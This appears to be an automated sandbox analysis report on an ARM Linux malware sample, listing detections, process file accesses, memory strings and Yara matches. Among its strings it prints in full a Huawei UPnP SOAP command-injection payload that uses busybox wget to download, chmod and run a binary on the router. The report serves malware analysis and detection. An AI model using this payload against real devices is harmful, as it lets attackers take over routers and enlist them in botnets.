Source: arm7.elf |
ReversingLabs: Detection: 57% |
Source: arm7.elf |
String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: arm7.elf |
String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/ |
Source: Initial sample |
String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g |
Source: Initial sample |
String containing 'busybox' found: -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: Initial sample |
String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: classification engine |
Classification label: mal76.troj.linELF@0/0@0/0 |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6274/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6273/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6276/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6275/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6278/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6311/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6277/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6310/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6279/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6312/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6270/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6272/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6271/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6304/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6303/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6306/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6305/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6308/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6307/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6309/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6043/cmdline |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6285/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6284/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6243/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6245/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6244/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6247/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6246/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6281/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6280/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6283/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6282/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/1/cmdline |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/4334/cmdline |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6252/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6296/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6251/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6295/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6298/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6253/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6297/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6256/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6299/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6258/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6257/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6292/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6250/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6294/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6293/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6249/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6248/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6262/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6300/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6269/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6302/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6301/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6261/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6260/status |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 6229) |
File opened: /proc/6259/status |
Jump to behavior |
Source: /usr/bin/dash (PID: 6291) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.TjQ3WJqRTx /tmp/tmp.dEkSBaCYg2 /tmp/tmp.cgax66qtsO |
Jump to behavior |
Source: /usr/bin/dash (PID: 6292) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.TjQ3WJqRTx /tmp/tmp.dEkSBaCYg2 /tmp/tmp.cgax66qtsO |
Jump to behavior |
Source: arm7.elf, 6217.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6219.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6230.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6220.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp |
Binary or memory string: U!/etc/qemu-binfmt/arm |
Source: arm7.elf, 6217.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6219.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6230.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp, arm7.elf, 6220.1.000055a77ed05000.000055a77ee7c000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/arm |
Source: arm7.elf, 6217.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6219.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6230.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6220.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-arm |
Source: arm7.elf, 6217.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6219.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6230.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp, arm7.elf, 6220.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp |
Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.elf |
Source: arm7.elf, 6230.1.00007ffe1b293000.00007ffe1b2b4000.rw-.sdmp |
Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped |
Source: Yara match |
File source: arm7.elf, type: SAMPLE |
Source: Yara match |
File source: 6217.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6220.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6219.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6230.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6217, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6219, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6220, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6230, type: MEMORYSTR |
Source: Yara match |
File source: arm7.elf, type: SAMPLE |
Source: Yara match |
File source: 6217.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6220.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6219.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6230.1.00007f20a4017000.00007f20a402f000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6217, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6219, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6220, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: arm7.elf PID: 6230, type: MEMORYSTR |